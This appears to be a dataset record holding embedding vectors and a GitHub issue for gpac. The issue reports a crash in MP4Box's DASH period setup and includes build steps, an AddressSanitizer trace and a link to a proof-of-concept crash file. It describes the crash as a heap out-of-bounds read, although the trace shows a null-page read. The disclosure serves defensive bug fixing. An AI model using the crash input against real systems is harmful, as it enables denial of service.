-0.006396874785423279, 0.01345757581293583, -0.00824083760380745, -0.010922965593636036, -0.01959294266998768, 0.011647139675915241, -0.023012656718492508, 0.008234132081270218, 0.02542657032608986, 0.015797732397913933, 0.019056517630815506, 0.005773279815912247, -0.015462466515600681, 0.013015025295317173, -0.0004092340241186321, -0.012391430325806141, 0.006329821422696114, 0.0008000283851288259, 0.012297555804252625, 0.005642526317387819, -0.015985481441020966, -0.008844316005706787, -0.02328086830675602, 0.013504513539373875, -0.003563877195119858, 0.013933653943240643, -0.019579531624913216, -0.009407563135027885, -0.022154375910758972, -0.016508495435118675, -0.020183011889457703, 0.012076280079782009, 0.038086213171482086, -0.03872992470860481, -0.003267166903242469, 0.0083950599655509, -0.00355717190541327, 0.00122455891687423, -0.011922057718038559, 0.0008876166539266706, -0.001036809990182519, 0.007255155593156815, 0.01440302561968565, 0.0012128246016800404, 0.010178674943745136, -0.00841517560184002, -0.0019328083144500852, 0.014242098666727543, 0.003300693351775408, -0.01902969554066658, 0.009581901133060455, 0.01516743190586567, 0.008120141923427582, 0.04109019786119461, -0.010011041536927223, -0.010111621581017971, -0.016588959842920303, 0.011412453837692738, 0.024608522653579712, 0.01929790899157524, -0.003929316997528076, -0.001089614350348711, 0.024930376559495926, -0.009937283582985401, 0.010688278824090958, -0.01995502971112728, -0.018922410905361176, -0.011298462748527527, 0.003086123149842024, -0.006316410843282938, -0.006346584763377905, -0.022167785093188286, 0.0035437613260000944, 0.03425076976418495, 0.006849483586847782, 0.004576380364596844, -0.015462466515600681, 0.02657988667488098, -0.011090598069131374, 0.0005079279653728008, 0.020799901336431503, -0.022382356226444244, 0.02542657032608986, -0.019043106585741043, -0.005310612730681896, -0.0023535671643912792, 0.004234408959746361, -0.008884548209607601, -0.014563953503966331, -0.005099395290017128, -0.018090952187776566, 0.002256339881569147, -0.004767482168972492, -0.0038924377877265215, 0.015583162195980549, -0.009092412889003754, -0.0024507942143827677, -0.00037298339884728193, 0.008636451326310635, -0.020008672028779984, -0.026888331398367882, -0.014268919825553894, 0.008462113328278065, 0.005008873529732227, 0.016977868974208832, -0.016334157437086105, -0.0015841317363083363, 0.002038417151197791, 0.0025614320766180754, -0.018211647868156433, 0.009367330931127071, -0.013316764496266842, 0.02122904174029827, -0.015368591994047165, -0.004653491545468569, 0.004965289030224085, 0.015583162195980549, -0.003959490917623043, -0.0010979960206896067, 0.0051429797895252705, 0.005823569837957621, 0.024273255839943886, -0.03060307726264, -0.0037315101362764835, -0.015757501125335693, 0.0015522814355790615, 0.006598034407943487, 0.007288682274520397, 0.00536090275272727, -0.018976053223013878, 0.017393598333001137, -0.008502344600856304, 0.0011214646510779858, 0.016977868974208832, 0.007637358736246824, -0.0007870368426665664, -0.01302172988653183, -0.008944896049797535, 0.0028866399079561234, 0.016468264162540436, 0.01657554879784584, -0.004868061747401953, -0.007509957533329725, -0.0017618226120248437, 0.026955382898449898, -0.01570385880768299, 0.002782707568258047, 0.00574310589581728, -0.011968995444476604, -0.015006504952907562, 0.04157298058271408, -0.006373405922204256, 0.00918628741055727, -0.012679758481681347, -0.016857173293828964, -0.00016208013403229415, -0.018520092591643333, -0.008797379210591316, 0.019083339720964432, -0.013470986858010292, 0.004110360983759165, -0.007986035197973251, -0.02459511160850525, 0.01085591223090887, 0.008260953240096569, -0.0033794809132814407, 0.007261860650032759, 0.04017827287316322, 0.011385632678866386, 0.0033845098223537207, 0.03599415346980095, 0.016025712713599205, 0.022476229816675186, 0.02214096486568451, -0.0005754001904278994, 0.002206050092354417, -0.01328323781490326, -0.00185569713357836, 0.021081523969769478, -0.02337474375963211, 0.00450597470626235, 0.0016268781619146466, -0.01269316952675581, 0.01941860467195511, 0.01175442524254322, -0.009923872537910938, 0.017299724742770195, 0.0012538947630673647, 0.017836149781942368, -0.028350090608000755, -0.0006747227744199336, 0.00467025488615036, 0.029262013733386993, 0.007664179895073175, -0.008690093643963337, -0.011747719720005989, 0.0070137642323970795, -0.0029101085383445024, -0.0016587283462285995, -0.0004197110829409212, 0.0014106315793469548, -0.014805344864726067, -0.022301891818642616, 0.0020820016507059336, 0.011647139675915241, -0.010218906216323376, 0.017205849289894104, -0.00042914043297059834, -0.01750088296830654, 0.004713839385658503, -0.00637005316093564, 0.004465742502361536, -0.003919259179383516, -0.004797656089067459, 0.00505245802924037, 0.006497454363852739, 0.0008272687555290759, 0.004874767269939184, -0.0062527102418243885, -0.01010491605848074, 0.01162031851708889, -0.011821477673947811, -0.0047440133057534695, 0.012699875049293041, -0.0087035046890378, 0.008864432573318481, -0.009427678771317005, -0.027210185304284096, 0.002258016262203455, -0.025024252012372017, -0.019351551309227943, 0.012746811844408512, 0.01008480042219162, 0.0002495635999366641, -0.034921303391456604, 0.018359163776040077, -0.0068863630294799805, 0.010245728306472301, 0.007865339517593384, -0.023039476945996284, 0.00312970788218081, 0.010420066304504871, -0.009923872537910938, 0.009923872537910938, -0.004455684684216976, 0.028484197333455086, -0.0035202926956117153, -0.040231917053461075, 0.00010681364074116573, 0.000716211914550513, 0.01547587662935257, -0.02656647562980652, -0.009541669860482216, -0.017742274329066277, 0.0018657550681382418, -0.031944140791893005, -0.00005909062747377902, -0.015516108833253384, 0.008448702283203602, 0.013403933495283127, 0.017608169466257095, 0.00024537279387004673, 0.001984774600714445, -0.012304261326789856, -0.004710486624389887, -0.008904663845896721, -0.02231530286371708, -0.0008993509691208601, -0.0034130075946450233, -0.008589514531195164, -0.0035772877745330334, -0.006856189109385014, 0.016991280019283295, -0.0043517523445189, 0.01877489499747753, -0.01779591664671898, 0.004231056664139032, -0.026727402582764626, 0.007858633995056152, -0.003563877195119858, 0.00797932967543602, 0.0034465340431779623, -0.005387723911553621, -0.0011122447904199362, 0.005186564289033413, -0.0021004413720220327, -0.01481875590980053, -0.015368591994047165, 0.025507034733891487, 0.0008260115282610059, -0.0017634989926591516, -0.006256063003093004, -0.01471147034317255, -0.0036007564049214125, 0.015382002107799053, -0.023039476945996284, -0.009159466251730919, 0.006336526945233345, -0.0003568487009033561, -0.005317318253219128, -0.009099118411540985, 0.008140257559716702, 0.02582889050245285, -0.012719990685582161, 0.007067406550049782, 0.01240484043955803, 0.012357903644442558, -0.025641141459345818, 0.01877489499747753, 0.00793909840285778, 0.026459190994501114, -0.012264029122889042, -0.007845223881304264, 0.001537194475531578, 0.005592236295342445, 0.01333017461001873, -0.0008934838115237653, 0.008301185443997383, -0.0035772877745330334, 0.005907386541366577, 0.0002862333203665912, 0.006189009640365839, -0.010513940826058388, 0.01023902278393507, 0.01530153863132, -0.01052064634859562, 0.005065868608653545, -0.007100933231413364, 0.000555703358259052, -0.01008480042219162, 0.017474062740802765, 0.025936175137758255, 0.004717192146927118, -0.016414621844887733, -0.002973809139803052, 0.0027994709089398384, -0.0031481473706662655, 0.0037616840563714504, -0.0063599953427910805, -0.02134973742067814, -0.000212265265872702, 0.006789135746657848, -0.011506328359246254, 0.010051273740828037, 0.004961936268955469, 0.02722359634935856, -0.014295740984380245, 0.018265290185809135, 0.007751349359750748, 0.002234547631815076, 0.00664161890745163, -0.0025312581565231085, 0.005079279188066721, -0.005538593977689743, 0.019391784444451332, 0.022905370220541954, 0.013524629175662994, 0.006574565544724464, -0.0015539576997980475, -0.0038522060494869947, -0.0012019284768030047, 0.009420973248779774, 0.004653491545468569, -0.0025128184352070093, 0.01636097952723503, 0.0006311381584964693, -0.027652736753225327, -0.00297548552043736, 0.025802068412303925, -0.01674988679587841, -0.010252432897686958, -0.024501236155629158, 0.018868768587708473, 0.0024005044251680374, -0.005880564916878939, -0.018251879140734673, -0.0016637573717162013, -0.01640121079981327, -0.0040734815411269665, 0.02051827684044838, -0.001724943402223289, 0.00964895449578762, -0.013826368376612663, 0.0009379065595567226, 0.00023363846412394196, 0.007617242634296417, 0.03411666303873062, -0.0034398287534713745, -0.0011348753469064832, 0.0016838733572512865, 0.003242021892219782, -0.003480060724541545, -0.00642369594424963, -0.008716914802789688, 0.0007811696850694716, 0.02074625715613365, 0.010024452582001686, 0.01405434962362051, 0.00626947358250618, -0.013605092652142048, -0.007241745013743639, 0.01692422665655613, 0.030978575348854065, 0.016159819439053535, 0.007094227708876133, 0.0032822538632899523, -0.0165353175252676, 0.00297548552043736, -0.036852434277534485, -0.032561030238866806, 0.005330728832632303, 0.027250418439507484, 0.00824754312634468, -0.00017664325423538685, -0.00015453665400855243, 0.0167901199311018, 0.018010487779974937, 0.02252987213432789, 0.031675927340984344, -0.003962843678891659, 0.016897404566407204, 0.015140610747039318, -0.008455407805740833, 0.02393799088895321, 0.0036845728754997253, -0.007295387331396341, -0.019485658034682274, 0.02762591652572155, 0.0024390600156039, 0.011479506269097328, 0.013356995768845081, -0.028162341564893723, 0.01512720063328743, -0.0031682634726166725, 0.0024038569536060095, 0.013685557059943676, -0.016200050711631775, -0.0183323435485363, -0.00726856617256999, 0.01754111610352993, 0.017380187287926674, -0.022771265357732773, -0.019043106585741043, -0.02691515162587166, 0.009762944653630257, -0.014470078982412815, 0.018211647868156433, 0.029127907007932663, -0.02507789433002472, 0.017259491607546806, -0.0005104424199089408, 0.003000630298629403, 0.0032571088522672653, 0.006554449442774057, 0.022905370220541954, -0.0021892867516726255, 0.02714313194155693, 0.022999245673418045, 0.0007769788498990238, -0.005924149416387081, -0.021121755242347717, -0.009836703538894653, -0.005273733753710985, -0.014872398227453232, 0.004623317625373602, 0.011787950992584229, -0.013880010694265366, 0.001805407227948308, 0.008428586646914482, -0.007053995970636606, 0.005122864153236151, -0.016910815611481667, 0.017514294013381004, 0.017071742564439774, -0.0017769095720723271, 0.006829367950558662, -0.022167785093188286, 0.006527628283947706, -0.010493825189769268, 0.006118603982031345, -0.020062316209077835, 0.0015237837797030807, -0.008146963082253933, 0.008354827761650085, 0.017634989693760872, 0.0014709794195368886, -0.007087522652000189, 0.01103025022894144, -0.017661811783909798, -0.00244408892467618, 0.0007095066248439252, 0.007717822678387165, -0.010125032626092434, 0.012123217806220055, -0.006001260597258806, 0.010815680027008057, 0.0016327452613040805, 0.014563953503966331, 0.022114142775535583, -0.0047641294077038765, 0.021845931187272072, 0.011593497358262539, -0.0026150746271014214, 0.02692856267094612, -0.004187471698969603, 0.0029352535493671894, 0.007630653213709593, 0.018439628183841705, -0.001859049778431654, 0.026204388588666916, -0.01784956082701683, -0.005662641953676939, -0.028886515647172928, -0.016897404566407204, 0.009984220378100872, 0.02907426469027996, -0.011499622836709023, -0.013732493855059147, 0.001009988714940846, -0.007429494056850672, 0.004546206444501877, -0.02631167322397232, 0.015288128517568111, -0.015408824197947979, -0.004616612568497658, 0.010004336014389992, -0.015811143442988396, 0.013678851537406445, -0.013705672696232796, 0.015770910307765007, -0.00505245802924037, 0.0027927656192332506, -0.010366423986852169, -0.007194807752966881, -0.0037985634990036488, 0.0004836211446672678, -0.02928883396089077, 0.002470910083502531, 0.020115958526730537, -0.020840132609009743, 0.016816940158605576, 0.00841517560184002, 0.007033879868686199, 0.0016821969766169786, -0.018694430589675903, -0.011452685110270977, 0.01023902278393507, 0.02411232888698578, 0.019673407077789307, 0.010795564390718937, 0.02617756649851799, 0.006021376699209213, 0.018520092591643333, -0.011077187955379486, -0.004341694060713053, -0.024353720247745514, 0.0038086213171482086, -0.008649862371385098, 0.013960475102066994, -0.00611525122076273, -0.014000706374645233, 0.021993447095155716, 0.013350291177630424, 0.0027475045062601566, -0.0022479582112282515, 0.0038890852592885494, 0.019177213311195374, 0.009541669860482216, -0.024501236155629158, 0.002816234016790986, 0.003972901497036219, -0.010996723547577858, -0.0033291911240667105, -0.03341931104660034, 0.03736203908920288, -0.0026972147170454264, 0.005836980417370796, -0.0016327452613040805, -0.006601386703550816, 0.009260046295821667, 0.011559970676898956, -0.005149685312062502, -0.004321578424423933, 0.006537686567753553, 0.006755609065294266, -0.002041769679635763, 0.007764759939163923, 0.006591328885406256, -0.0028832873795181513, -0.0024792917538434267, -0.006225889082998037, 0.003949433099478483, -0.02476944960653782, 0.0100646847859025, 0.012156743556261063, 0.012445072643458843, 0.011781246401369572, 0.013826368376612663, 0.0010560877854004502, -0.004271288402378559, 0.008924780413508415, 0.004190824460238218, 0.0067589618265628815, -0.03881038725376129, 0.013799547217786312, 0.008348122239112854, 0.01074192114174366, -0.001060278620570898, -0.023696597665548325, -0.012639527209103107, -0.00573304807767272, 0.012123217806220055, -0.01872125081717968, -0.0016553757013753057, 0.016146408393979073, -0.0034834134858101606, -0.021202219650149345, -0.0067991940304636955, -0.013162542134523392, 0.00872362032532692, 0.0009194668964482844, 0.005431308876723051, 0.011217999272048473, 0.030495792627334595, 0.0024541469756513834, 0.004247820004820824, -0.010594404302537441, -0.005662641953676939, -0.019794102758169174, 0.003982959780842066, 0.006718730088323355, -0.0164816752076149, -0.002073619980365038, -0.012726696208119392, 0.005608999636024237, -0.015596573241055012, 0.01221038680523634, -0.0006156321032904088, -0.01516743190586567, 0.020719436928629875, -0.0062728263437747955, 0.019659996032714844, 0.007617242634296417, 0.024849914014339447, 0.011264936067163944, -0.014014117419719696, 0.004613259807229042, -0.005823569837957621, 0.00595097104087472, 0.013296647928655148, 0.00468031270429492, -0.0032487271819263697, -0.001937837339937687, -0.004935115110129118, 0.004780892748385668, 0.004653491545468569, 0.008582809008657932, -0.0032336402218788862, -0.009058886207640171, -0.006527628283947706, -0.013960475102066994, 0.007248450070619583, -0.004653491545468569, 0.01471147034317255, 0.03486765921115875, 0.010487119667232037, -0.005310612730681896, -0.004794303327798843, -0.018090952187776566, -0.010366423986852169, 0.009025359526276588, 0.02507789433002472, 0.009199698455631733, 0.01345757581293583, 0.018654199317097664, -0.005655936896800995, -0.00716798659414053, -0.01052064634859562, 0.0027022436261177063, -0.0036979836877435446, 0.0016335834516212344, -0.014791934750974178, 0.004770834930241108, 0.023334510624408722, 0.002363624982535839, 0.00542460335418582, -0.012337788008153439, -0.0017869676230475307, 0.010795564390718937, -0.007617242634296417, -0.007731233257800341, -0.00947461649775505, 0.007664179895073175, 0.0022462820634245872, -0.010822385549545288, 0.0032822538632899523, 0.004428863525390625, 0.010775447823107243, 0.021993447095155716, 0.0007866177475079894, 0.010607815347611904, 0.01696445792913437, 0.026258030906319618, -0.0006315572536550462, 0.007737938314676285, -0.004039954859763384, -0.009300277568399906, 0.014107991941273212, 0.012170154601335526, -0.004284698981791735, -0.004036602098494768, 0.021161988377571106, -0.009903756901621819, 0.004831182770431042, -0.02530587464570999, 0.03559183329343796, -0.0020903833210468292, -0.01640121079981327, -0.011325283907353878, 0.004559617023915052, -0.002656982745975256, -0.016200050711631775, 0.005193269811570644, -0.015288128517568111, 0.019659996032714844, 0.012854097411036491, 0.022435998544096947, 0.004566322546452284, -0.011070482432842255, 0.006168894004076719, -0.010406655259430408, 0.023388152942061424, 0.004687018226832151, 0.002306629903614521, 0.02521200105547905, 0.009159466251730919, 0.009280161932110786, -0.007838518358767033, 0.00641363812610507, -0.01098331343382597, 0.01999526284635067, -0.012022637762129307, -0.015690447762608528, -0.010949786752462387, 0.002677098847925663, -0.0017718806630000472, 0.0017400303622707725, -0.019002875313162804, 0.018788304179906845, -0.006494101602584124, 0.0020836780313402414, -0.0031498237513005733, -0.016428032889962196, 0.01937837339937687, -0.006447164341807365, 0.025010840967297554, -0.01885535754263401, -0.015770910307765007, 0.015945250168442726, -0.0013645325088873506, -0.016776708886027336, 0.004811066668480635, -0.026499422267079353, 0.00437186798080802, -0.017380187287926674, -0.0014223658945411444, 0.016816940158605576, -0.018841946497559547, -0.009246635250747204, -0.012699875049293041, -0.00791227724403143, -0.004418805241584778, -0.009870230220258236, -0.01587819680571556, 0.0032319638412445784, -0.0016360979061573744, -0.020451223477721214, 0.008589514531195164 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
# Description ``` Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374 ``` # Version ``` git log commit 422b78ecf79ceeee97104d219cc4f184b1348cec (HEAD -> master, origin/master, origin/HEAD) Author: Aurelien David <[email protected]> Date: Mon Feb 26 10:53:25 2024 +0100 ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev921-g422b78ecf-master ``` ``` ./configure --enable-sanitizer make ``` # ASAN log ``` ./MP4Box -info ok2.dat [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 AddressSanitizer:DEADLYSIGNAL ================================================================= ==112724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f6994dc5a47 bp 0x7ffd323b6110 sp 0x7ffd323b60c8 T0) ==112724==The signal is caused by a READ memory access. ==112724==Hint: address points to the zero page. #0 0x7f6994dc5a46 (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) #1 0x7f6994cd4db5 in _IO_str_init_static_internal /build/glibc-wuryBv/glibc-2.31/libio/strops.c:41 #2 0x7f6994ca4421 in _IO_strfile_read ../libio/strfile.h:95 #3 0x7f6994ca4421 in __GI___isoc99_vsscanf /build/glibc-wuryBv/glibc-2.31/stdio-common/isoc99_vsscanf.c:33 #4 0x7f699ac85854 in __interceptor___isoc99_vsscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1474 #5 0x7f699ac8597e in __interceptor___isoc99_sscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1497 #6 0x7f6997b5d12e in gf_dash_setup_period media_tools/dash_client.c:6374 #7 0x7f6997b5d12e in dash_setup_period_and_groups media_tools/dash_client.c:7736 #8 0x7f6997b5d12e in gf_dash_process_internal media_tools/dash_client.c:8068 #9 0x7f6997b5d12e in gf_dash_process media_tools/dash_client.c:8139 #10 0x7f69981f1f15 in dashdmx_process filters/dmx_dash.c:3194 #11 0x7f69980ac2b5 in gf_filter_process_task filter_core/filter.c:3025 #12 0x7f69980793f1 in gf_fs_thread_proc filter_core/filter_session.c:2100 #13 0x7f699807e1a6 in gf_fs_run filter_core/filter_session.c:2400 #14 0x7f6997a9f406 in gf_media_import media_tools/media_import.c:1239 #15 0x563a09e4b4b1 in convert_file_info /home/fuzz/gpac/applications/mp4box/fileimport.c:130 #16 0x563a09e15ff4 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6391 #17 0x7f6994c65082 in __libc_start_main ../csu/libc-start.c:308 #18 0x563a09ded09d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa609d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) ==112724==ABORTING ``` ``` poc download: https://github.com/Janette88/test_pocs/blob/main/ok2.dat ``` ``` **Impact** An OOB read on the heap can potentially cause a crash or information disclosure in some cases. Could be leveraged with other vulnerabilities for a more serious impact. ``` Credit: Jq Wang
Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374
https://api.github.com/repos/gpac/gpac/issues/2763/comments
0
2024-02-27T02:31:15
2024-02-27T13:59:40Z
https://github.com/gpac/gpac/issues/2763
2,155,523,042
2,763
false
This is a GitHub Issue repo:gpac owner:gpac Title : Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374 Issue date: --- start body --- # Description ``` Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374 ``` # Version ``` git log commit 422b78ecf79ceeee97104d219cc4f184b1348cec (HEAD -> master, origin/master, origin/HEAD) Author: Aurelien David <[email protected]> Date: Mon Feb 26 10:53:25 2024 +0100 ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev921-g422b78ecf-master ``` ``` ./configure --enable-sanitizer make ``` # ASAN log ``` ./MP4Box -info ok2.dat [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 AddressSanitizer:DEADLYSIGNAL ================================================================= ==112724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f6994dc5a47 bp 0x7ffd323b6110 sp 0x7ffd323b60c8 T0) ==112724==The signal is caused by a READ memory access. ==112724==Hint: address points to the zero page. #0 0x7f6994dc5a46 (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) #1 0x7f6994cd4db5 in _IO_str_init_static_internal /build/glibc-wuryBv/glibc-2.31/libio/strops.c:41 #2 0x7f6994ca4421 in _IO_strfile_read ../libio/strfile.h:95 #3 0x7f6994ca4421 in __GI___isoc99_vsscanf /build/glibc-wuryBv/glibc-2.31/stdio-common/isoc99_vsscanf.c:33 #4 0x7f699ac85854 in __interceptor___isoc99_vsscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1474 #5 0x7f699ac8597e in __interceptor___isoc99_sscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1497 #6 0x7f6997b5d12e in gf_dash_setup_period media_tools/dash_client.c:6374 #7 0x7f6997b5d12e in dash_setup_period_and_groups media_tools/dash_client.c:7736 #8 0x7f6997b5d12e in gf_dash_process_internal media_tools/dash_client.c:8068 #9 0x7f6997b5d12e in gf_dash_process media_tools/dash_client.c:8139 #10 0x7f69981f1f15 in dashdmx_process filters/dmx_dash.c:3194 #11 0x7f69980ac2b5 in gf_filter_process_task filter_core/filter.c:3025 #12 0x7f69980793f1 in gf_fs_thread_proc filter_core/filter_session.c:2100 #13 0x7f699807e1a6 in gf_fs_run filter_core/filter_session.c:2400 #14 0x7f6997a9f406 in gf_media_import media_tools/media_import.c:1239 #15 0x563a09e4b4b1 in convert_file_info /home/fuzz/gpac/applications/mp4box/fileimport.c:130 #16 0x563a09e15ff4 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6391 #17 0x7f6994c65082 in __libc_start_main ../csu/libc-start.c:308 #18 0x563a09ded09d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa609d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) ==112724==ABORTING ``` ``` poc download: https://github.com/Janette88/test_pocs/blob/main/ok2.dat ``` ``` **Impact** An OOB read on the heap can potentially cause a crash or information disclosure in some cases. Could be leveraged with other vulnerabilities for a more serious impact. ``` Credit: Jq Wang --- end body ---
3,296
[ -0.0440882109105587, 0.0052580093033611774, -0.006629835814237595, 0.011543900705873966, 0.029444852843880653, -0.010152306407690048, -0.03589678555727005, 0.04721929505467415, -0.042190585285425186, 0.0073137725703418255, -0.010057425126433372, -0.000891489558853209, 0.027515597641468048, -0.013694544322788715, 0.019324172288179398, 0.021459003910422325, -0.031437359750270844, 0.025665411725640297, 0.007665624376386404, 0.03184851258993149, 0.021617138758301735, -0.01268247701227665, -0.019751138985157013, 0.057181838899850845, -0.0024748225696384907, 0.02669329196214676, -0.031326666474342346, 0.003900019684806466, 0.0015487407799810171, 0.022486886009573936, -0.0012660733191296458, 0.012895959429442883, -0.0044831447303295135, 0.005973572842776775, 0.03535912558436394, 0.0008084683795459569, 0.030773192644119263, 0.07173031568527222, 0.0197036974132061, -0.021949224174022675, -0.016240527853369713, -0.03912275284528732, -0.029429038986563683, 0.007436327636241913, 0.0012660733191296458, 0.0037142103537917137, 0.016169367358088493, 0.0019826253410428762, -0.027910936623811722, -0.021759461611509323, 0.007361213210970163, -0.01486474834382534, -0.02305617369711399, -0.059838518500328064, -0.006238450296223164, -0.03969204053282738, 0.037161871790885925, 0.01253224816173315, -0.010073238983750343, 0.0056612552143633366, -0.015750307589769363, -0.01434290036559105, 0.01361547689884901, 0.032006651163101196, 0.00555056007578969, -0.0015734494663774967, -0.03138992190361023, 0.03776278719305992, -0.03124759905040264, 0.05781438201665878, 0.009654179215431213, -0.03020390309393406, 0.009069077670574188, 0.04639698937535286, 0.013552222400903702, -0.0413682796061039, 0.03222803771495819, 0.013813146390020847, -0.02068413980305195, 0.006475653499364853, -0.056707434356212616, 0.039186008274555206, -0.0314057357609272, 0.009179772809147835, 0.016588427126407623, -0.0060447342693805695, -0.0286858007311821, -0.08665832132101059, -0.02971368283033371, -0.029112767428159714, 0.007226797752082348, 0.017727002501487732, 0.014667078852653503, 0.014856841415166855, 0.02122179977595806, 0.017616307362914085, -0.02120598591864109, -0.009045357815921307, -0.0474090576171875, 0.008068869821727276, -0.05882645025849342, -0.0023186635226011276, 0.028100699186325073, -0.012208069674670696, 0.015062417834997177, 0.004791509360074997, -0.0068512256257236, -0.03504285216331482, 0.028416970744729042, 0.13080978393554688, 0.0198934618383646, 0.02139575034379959, -0.00844444241374731, 0.010136493481695652, -0.020747393369674683, 0.025444021448493004, 0.0004037400067318231, -0.009938823990523815, -0.048009973019361496, -0.007934454828500748, 0.020952969789505005, -0.02756303921341896, 0.0008895128848962486, 0.04070410877466202, -0.006566581781953573, 0.0571502149105072, -0.010247188620269299, -0.009053263813257217, -0.030962955206632614, -0.012334578670561314, -0.0370669886469841, -0.019593004137277603, 0.01236620545387268, -0.0198934618383646, 0.020257173106074333, 0.009772781282663345, -0.041305024176836014, 0.03176944702863693, 0.03086807392537594, 0.033651258796453476, -0.042506854981184006, -0.02001996897161007, 0.049180179834365845, -0.005313356872648001, -0.002818767447024584, 0.01986183412373066, 0.007377026602625847, -0.017995834350585938, -0.03839533030986786, 0.003423636080697179, 0.004578026011586189, -0.013655010610818863, 0.006558674853295088, 0.02487473376095295, 0.06806156784296036, 0.005020806100219488, 0.01905534230172634, 0.019972529262304306, -0.0031884093768894672, -0.023340817540884018, 0.002083436818793416, -0.02353058010339737, 0.01418476551771164, -0.043835192918777466, -0.0049931323155760765, -0.03605492040514946, 0.026456089690327644, -0.0013500828063115478, -0.015449849888682365, 0.01820141077041626, -0.0008163751335814595, -0.02440032549202442, 0.005088013596832752, 0.010642527602612972, -0.05446190759539604, -0.006301704328507185, 0.025159377604722977, 0.05945899337530136, -0.02370452880859375, -0.003726070513948798, -0.02386266551911831, 0.009938823990523815, 0.006191009655594826, -0.01344152819365263, -0.002640864811837673, -0.02122179977595806, 0.004309195559471846, -0.06113523244857788, 0.008215145207941532, 0.0023028498981148005, -0.002723886165767908, -0.00386048574000597, -0.012129002250730991, -0.012310857884585857, 0.008404907770454884, -0.005372657906264067, -0.023325003683567047, -0.03123178519308567, 0.0014074069913476706, -0.001622866839170456, -0.003605492180213332, -0.023151054978370667, -0.004578026011586189, 0.010342069901525974, -0.04152641445398331, 0.011164374649524689, -0.021427376195788383, 0.05610651895403862, 0.032797329127788544, -0.006558674853295088, -0.01805908791720867, -0.03339824452996254, 0.033145226538181305, -0.0028662080876529217, -0.02338825911283493, 0.010041612200438976, 0.0013411877444013953, 0.002049833070486784, -0.007843527011573315, -0.01703120581805706, 0.03469495475292206, -0.021775275468826294, 0.0061356620863080025, 0.012223883531987667, -0.041842684149742126, -0.02520681731402874, 0.007661670912057161, -0.008839781396090984, -0.008128170855343342, -0.014825214631855488, 0.013307112269103527, -0.005246149376034737, -0.00600520009174943, 0.002876091515645385, 0.02134830877184868, 0.002702142344787717, -0.0006582395290024579, -0.007879107259213924, 0.002190178260207176, 0.011330417357385159, -0.019672071561217308, 0.009266747161746025, -0.017331663519144058, -0.02356220781803131, -0.004380356520414352, 0.04155804216861725, -0.012627129442989826, -0.008863501250743866, -0.0243845134973526, 0.01344943419098854, -0.020763207226991653, -0.021474817767739296, 0.0063768187537789345, 0.0030263203661888838, -0.006270077545195818, -0.012208069674670696, 0.001552694127894938, -0.004103619139641523, -0.003979087341576815, -0.015426130034029484, 0.04674489051103592, 0.025412393733859062, -0.04573282226920128, 0.001455836114473641, 0.021000409498810768, -0.025934241712093353, -0.005605907645076513, 0.0200041551142931, -0.012144816108047962, -0.046175602823495865, 0.02054181694984436, 0.009756967425346375, -0.021490631625056267, -0.034125667065382004, -0.007981895469129086, -0.004479191266000271, -0.0015388572355732322, -0.0002974926319438964, 0.0037754878867417574, -0.015560545027256012, 0.010468577966094017, 0.013180604204535484, -0.0010476484894752502, -0.01851768046617508, 0.00005043661440140568, -0.01520473975688219, -0.003312941174954176, -0.010650433599948883, -0.0013095606118440628, 0.015694960951805115, 0.020573444664478302, 0.02806907333433628, -0.06436119973659515, 0.0198934618383646, 0.008895128965377808, 0.03561214357614517, 0.003285267623141408, -0.008784433826804161, -0.019909273833036423, 0.0011029959423467517, -0.01853349432349205, 0.012397832237184048, -0.008895128965377808, -0.02485891990363598, -0.02990344539284706, -0.017300037667155266, -0.03311359882354736, -0.022123172879219055, -0.010792756453156471, 0.0012561898911371827, 0.030789004638791084, -0.06799831986427307, -0.024289632216095924, -0.020083224400877953, -0.0031607358250766993, -0.03040947951376438, -0.0034256128128618, -0.01718934252858162, 0.014904282055795193, -0.002567727118730545, -0.012484807521104813, -0.014042442664504051, -0.0407673642039299, 0.03393590450286865, 0.024621715769171715, -0.01889720745384693, -0.022645020857453346, 0.004815229680389166, -0.07508279383182526, 0.016572613269090652, -0.0032141064293682575, -0.008618391118943691, -0.004862670321017504, -0.04060922563076019, 0.0004264719900675118, -0.06224218010902405, -0.018090715631842613, -0.0014064186252653599, 0.015133579261600971, 0.006254263687878847, -0.0116071542724967, 0.009701620787382126, 0.003061900846660137, -0.012990841642022133, -0.010516018606722355, -0.014485223218798637, 0.002834581071510911, -0.0071398233994841576, 0.016493545845150948, 0.004514771979302168, 0.0010970658622682095, 0.02952392026782036, 0.023498952388763428, 0.04788346588611603, 0.011077400296926498, 0.013987096026539803, -0.03069412335753441, -0.016635866835713387, 0.01951393485069275, -0.014279646798968315, -0.0034177061170339584, -0.021142732352018356, -0.014904282055795193, 0.028353717178106308, 0.02402080036699772, -0.009480230510234833, 0.0014251972315832973, -0.020083224400877953, 0.0001265085011254996, 0.004348729737102985, -0.04127339646220207, 0.04124176874756813, 